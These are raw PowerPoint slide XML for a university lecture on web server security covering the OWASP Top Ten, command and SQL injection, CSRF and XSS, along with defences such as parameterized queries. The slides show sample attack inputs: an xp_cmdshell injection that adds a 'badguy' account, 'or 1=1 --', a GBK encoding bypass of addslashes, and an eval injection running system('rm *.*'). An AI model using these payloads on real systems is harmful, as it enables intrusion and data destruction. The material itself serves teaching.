              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,  etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahom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009900"/>
              </a:solidFill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C. Edward Chow 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Hodigere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Resources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07F75-139E-4502-A23C-6822D349B884}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/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smtClean="0"/>
              <a:t>worse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666118" y="4159770"/>
            <a:ext cx="2258682" cy="42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user =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′ ;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exec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cmdshell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			′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net user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badguy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badpwd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′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/ ADD --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  <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill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Then script does: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ok = execute( SELECT … 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Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			WHERE username= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800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′ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty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; exec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Arial" charset="0"/>
              </a:rPr>
              <a:t>…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  <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  )</a:t>
            </a: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009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Aria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If SQL server context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runs as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, attacker gets account on DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty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917E9-C890-4124-BBEF-2FBCA2116E5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99330" name="Picture 2" descr="Exploits of a M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444964" cy="259942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47801" y="4876800"/>
            <a:ext cx="557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see how the attack described in this cartoon works…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Preventing SQL Injection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Never build SQL commands yourself !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Use  parameterized/prepared  SQL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Use  ORM  framework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51D48-A365-4BE1-9B85-BCD6930D4F38}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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81600" y="2757488"/>
            <a:ext cx="2743200" cy="1890712"/>
            <a:chOff x="3264" y="1641"/>
            <a:chExt cx="1728" cy="1191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264" y="1641"/>
              <a:ext cx="1728" cy="1191"/>
              <a:chOff x="3552" y="249"/>
              <a:chExt cx="1728" cy="1191"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1333258" name="Text Box 10"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3557" y="249"/>
                <a:ext cx="971" cy="33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0x </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" u="sng"/>
                  <a:t>5c</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2400">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>\</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1333259" name="Text Box 11"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3552" y="633"/>
                <a:ext cx="1425" cy="33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0x </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" u="sng"/>
                  <a:t>bf</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" u="sng"/>
                  <a:t>27</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800"/>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1">
                    <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                  </a:rPr>
                  <a:t>¿′</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US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3552" y="1017"/>
                <a:ext cx="1728" cy="423"/>
                <a:chOff x="3504" y="1161"/>
                <a:chExt cx="1728" cy="423"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1333254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65089" t="48508" r="31905" b="48581"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4681" y="1197"/>
                  <a:ext cx="551" cy="38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 type="none" w="lg" len="med"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="133326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04" y="1161"/>
                  <a:ext cx="1252" cy="330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0x </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="2800" u="sng"/>
                    <a:t>bf 5c</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="2800"/>
                    <a:t>  </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="2800">
                      <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                    </a:rPr>
                    <a:t>  </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US">
                      <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1333264" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="1641"/>
              <a:ext cx="1728" cy="1191"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300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addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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PHP:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’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or 1 = 1 --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outputs:    “  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\’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or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34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dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unicode attack:   (GBK) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0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$user =  0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf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u="sng" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>addslashes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($user)     0x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>bf 5c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u="sng" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>implementation:   </a:t>
            </a:r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  <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>mysql_real_escape_string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sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>        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4" y="4800601"/>
            <a:ext cx="981076" cy="685800"/>
            <a:chOff x="4464" y="3168"/>
            <a:chExt cx="618" cy="432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="133325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l="65089" t="48508" r="31905" b="48581"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4464" y="3213"/>
              <a:ext cx="551" cy="38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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1333256" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4896" y="3168"/>
              <a:ext cx="186" cy="4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>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>′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09600" y="3124200"/>
            <a:ext cx="6629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9269-159F-478B-A6FC-B0A04D180025}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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Parameterized/prepared  SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130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r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Builds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL queries by properly escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>′  </a:t>
            </a:r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   \′</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:   Parameterized SQL:    (ASP.NET 1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Ensures SQL arguments are properly escaped.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SqlCommand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cmd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 = new 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SqlCommand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( </a:t>
            </a:r>
            <a:b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</a:b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	"SELECT * FROM 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UserTable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 WHERE 	</a:t>
            </a:r>
            <a:b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</a:b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	username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@User</a:t>
            </a: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AND </a:t>
            </a:r>
            <a:b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</a:b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	password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Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", 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dbConnection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);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cmd.Parameters.Add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("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@User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", Request[“user”] );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cmd.Parameters.Add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("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Pwd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", Request[“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pwd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”] );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2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd.ExecuteReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="150000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In PHP:    bound parameters  --  similar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6: Web Server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6 Modules on Web Client Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.1:  Major Web server Threats: 				Command and SQL Injection Attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.2:  CSRF – Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.3:  XSS – Cross-Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.4:  Defenses and Protections against XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.5:  Finding Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Module 6.6:  Secure Development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6.1: Major Web Server Threats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Command and SQL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Ten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>             (2013)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1451176"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="1457960"/>
          <a:ext cx="80010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209800"/>
                <a:gridCol w="5257800"/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Injection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Untrusted data is sent to an interpreter as part of a command or query.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1900" b="1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Authentication and Session Management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Attacks passwords, keys, or session tokens, or exploit other implementation flaws to assume other users’ identities.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Cross-site 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application takes untrusted data and sends it to a web browser without proper validation or escaping</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="19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Various implementation problems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…</a:t>
                      </a:r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expose a file, directory, or database key without access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1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 check, …misconfiguration, …missing function-level access control</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="19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Cross-site request forgery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logged-on victim’s browser sends a forged HTTP request, including the victim’s session cookie and other authentication information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722" y="6457891"/>
            <a:ext cx="556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https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="26730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533400" y="1524000"/>
            <a:ext cx="114300" cy="21336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Three vulnerabilities we will discuss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends browser request to good web site, using credentials of an innocent victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web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533400" y="1524000"/>
            <a:ext cx="114300" cy="21336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Three vulnerabilities we will discuss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends request to good web site, using credentials of an innocent victim who “visits” site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web 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4648201"/>
            <a:ext cx="3962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Inject malicious script into trusted context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3330577"/>
            <a:ext cx="3962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Leverage user’s session at </a:t>
            </a:r>
          </a:p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victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server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035177"/>
            <a:ext cx="3962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Uses SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>change meaning of database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Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128307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 for SQL Injection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code injection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Attack goal: execute arbitrary code on the server</a:t>
            </a:r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code injection based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   (PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php        (server side calculator)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Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php?exp=“ 10 ; system(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> *.*’) 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9209" y="6324600"/>
            <a:ext cx="140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(URL encoded)</a:t>
            </a:r>
            <a:endParaRPr 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05000" y="3657602"/>
            <a:ext cx="3505200" cy="1476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  $in = $_GET[‘exp']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …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38187</TotalTime>
  <Words>856</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>242</Paragraphs>
  <Slides>24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6: Modules 6.1-6.10 Web Server Security  CSE 628/628A</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>Lecture 6: Web Server Security</vt:lpstr>
      <vt:lpstr>Module 6.1: Major Web Server Threats</vt:lpstr>
      <vt:lpstr>OWASP Top Ten              (2013)</vt:lpstr>
      <vt:lpstr>Three vulnerabilities we will discuss</vt:lpstr>
      <vt:lpstr>Three vulnerabilities we will discuss</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>General code injection attacks</vt:lpstr>
      <vt:lpstr>Code injection using   system()</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Database queries with PHP</vt:lpstr>
      <vt:lpstr>Basic picture: SQL Injection</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>Slide 15</vt:lpstr>
      <vt:lpstr>Example:  buggy login page  (ASP)</vt:lpstr>
      <vt:lpstr>Slide 17</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr>Even worse</vt:lpstr>
      <vt:lpstr>Even worse …</vt:lpstr>
      <vt:lpstr>Slide 21</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>PHP addslashes()</vt:lpstr>
      <vt:lpstr>Parameterized/prepared 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3773</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-11T05:13:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-19T16:55:07Z</dcterms:modified>
</cp:coreProperties>
</file>